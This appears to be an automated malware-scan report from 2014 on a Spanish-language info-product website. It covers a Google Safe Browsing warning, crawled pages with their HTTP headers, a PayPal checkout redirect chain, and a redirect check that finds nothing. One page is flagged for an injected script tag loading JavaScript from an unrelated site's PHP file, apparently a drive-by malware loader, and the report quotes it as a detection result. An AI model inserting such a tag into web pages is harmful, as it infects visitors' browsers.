Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=creainfoproductosexitosos.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://creainfoproductosexitosos.info/ | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Dec 2014 01:08:15 GMT Accept-Ranges: bytes Server: nginx/1.6.2 Content-Length: 865 Content-Type: text/html Last-Modified: Fri, 14 Nov 2014 01:51:33 GMT | clean |
http://creainfoproductosexitosos.info/creainfoproductosexitosos-.html | 200 OK Content-Length: 36929 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://cpfacilitation.com.au/cpfacilitation.com.au/kt6pbvvd.php?id=2143582"></script> | ||
http://creainfoproductosexitosos.info/./ordenarPP.php | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 18 Dec 2014 01:08:16 GMT Location: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=P6M9E39ZESJP2 Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html | clean |
https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=p6m9e39zesjp2 | HTTP/1.1 302 Moved Temporarily Connection: close Connection: Transfer-Encoding Date: Thu, 18 Dec 2014 01:08:18 GMT Location: https://www.paypal.com/mx/cgi-bin/webscr?cmd=_flow&SESSION=DoPNcx5reIu5GHW1dii1Q-0uk_T--_BV4IO5bE5H0d2O3qTFl90rx1GL-Ri&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198d8562aa8a3da7ac30bbfba73b3e80dcc Server: Apache Content-Encoding: gzip Content-Type: text/html DC: slc-a-origin-www-1.paypal.com Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=kI-wFJ6uVZdE4xIvXegcQ4GiIhdUEqEEQBGxhLnlhyThnr-0Lxx51OUQgFJP9mrgBHt-egbfyF--L2fKoWMXCpfxAIx1-8X55HRR4WsO6OrJztpNvbOghlzlVevCa2hDjON5zm2SQRX5i-21wNp506gEDwpFawEAVEo9xfQUMvtQxREeGQnnu2_kZkdXdFy8hCEHDdoBJpiXkyfCkmf_gFRzeq0M-hmeLspwueviRwZV9F-_bDeEYlARy1i; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=JKaNXbnoMk2TqZXoyE--0Qii7aGTw5DuLICUMNQVx2LEaXmDnNHI9_JPzlzOT7BVU30RO4UVGor-7HlS; expires=Wed, 13-Dec-2034 01:08:18 GMT; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: cookie_check=yes; expires=Sun, 15-Dec-2024 01:08:18 GMT; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: navcmd=_xclick; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: abc_switch_cross_paypal=R1190%26WPSG%3d0%40500%7c1418951297%7ce%3bv%3bw%3b6%26; expires=Sat, 28-Mar-2015 01:08:18 GMT; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: tYO7fcUaay8ZtLdfOSkkxbhU8o0=IC5WJaqhowolQUYB_VxMWWF7ffNJPJuxwss5EaALPYLj5Dstb0uQElaLw8vRQRC1RTHfTW; expires=Mon, 16-Feb-2015 01:08:18 GMT; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: pNTcMTtQfrJuaJiwEnWXQ6yNxfq=HF8xRbi7IQTjG_ELyfy_Sgx1PVcbG-TcotpS6j4C1GUpv4tG7IFSKF4iHSS3DenZi1Qsue5vmzM0cWsdj5Yej2Oo7oD0AZoiUbSn67azp_X6iRZK3AwOPmTg7Xx6MFyUWmG3LyaBECM_oHQVC0iVz9EhOr7Mx7iFFtYabazo9-8vDUgTGOXzKLdkgFgHKPiJwa7pX6DeMiT3-zTQuqNT74REbf-OMNsLHhRNslEIvnNKlI9AeV2TCTc40YxAl0DTCHwSja1jMoKMhMzeBXh9-DidXsLBM63jjTE7Z4CZt_Kr4KexlMCUdMwunm7F3olpYDFMULCIhO19GOSuEVd_RzyhQHPDNq3XPK9A6HR9fJ9y2iiJ; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: Apache=10.73.8.137.1418864897214288; path=/; expires=Sat, 10-Dec-44 01:08:17 GMT Set-Cookie: X-PP-SILOVER=name%3DLIVE5.WEB.1%26silo_version%3D880%26app%3Dslingshot%26TIME%3D19501652; domain=.paypal.com; path=/; Secure; HttpOnly Set-Cookie: X-PP-SILOVER=; Expires=Thu, 01 Jan 1970 00:00:01 GMT Set-Cookie: Apache=10.73.8.35.1418864897203727; path=/; expires=Sat, 10-Dec-44 01:08:17 GMT Set-Cookie: AKDC=slc-a-origin-www-1.paypal.com; expires=Thu, 18-Dec-2014 01:38:18 GMT; path=/; secure Strict-Transport-Security: max-age=63072000 X-Frame-Options: SAMEORIGIN | clean |
https://www.paypal.com/mx/cgi-bin/webscr?cmd=_flow&session=dopncx5reiu5ghw1dii1q-0uk_t--_bv4io5be5h0d2o3qtfl90rx1gl-ri&dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198d8562aa8a3da7ac30bbfba73b3e80dcc | 200 OK Content-Length: 17137 Content-Type: text/html | clean |
https://www.paypalobjects.com/WEBSCR-640-20141004-1/js/lib/min/global.js | 200 OK Content-Length: 61553 Content-Type: application/x-javascript | clean |
https://www.paypalobjects.com/WEBSCR-640-20141004-1/js/opinionlab/oo_engine.js | 200 OK Content-Length: 3292 Content-Type: application/x-javascript | clean |
https://www.paypalobjects.com/WEBSCR-640-20141004-1/js/lib/min/widgets.js | 200 OK Content-Length: 142696 Content-Type: application/x-javascript | clean |
https://www.paypalobjects.com/WEBSCR-640-20141004-1/js/site_catalyst/pp_jscode_080706.js | 200 OK Content-Length: 61883 Content-Type: application/x-javascript | clean |
http://creainfoproductosexitosos.info/./ | HTTP/1.1 200 OK Connection: close Date: Thu, 18 Dec 2014 01:08:22 GMT Accept-Ranges: bytes Server: nginx/1.6.2 Content-Length: 865 Content-Type: text/html Last-Modified: Fri, 14 Nov 2014 01:51:33 GMT | clean |
http://creainfoproductosexitosos.info/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: creainfoproductosexitosos.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 01:08:15 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 865
Content-Type: text/html
Last-Modified: Fri, 14 Nov 2014 01:51:33 GMT
...865 bytes of data.
GET / HTTP/1.1
Host: creainfoproductosexitosos.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 01:08:15 GMT
Accept-Ranges: bytes
Server: nginx/1.6.2
Content-Length: 865
Content-Type: text/html
Last-Modified: Fri, 14 Nov 2014 01:51:33 GMT
...865 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: creainfoproductosexitosos.info
Referer: http://www.google.com/search?q=creainfoproductosexitosos.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: creainfoproductosexitosos.info
Referer: http://www.google.com/search?q=creainfoproductosexitosos.info
Result:
The result is similar to the first query. There are no suspicious redirects found.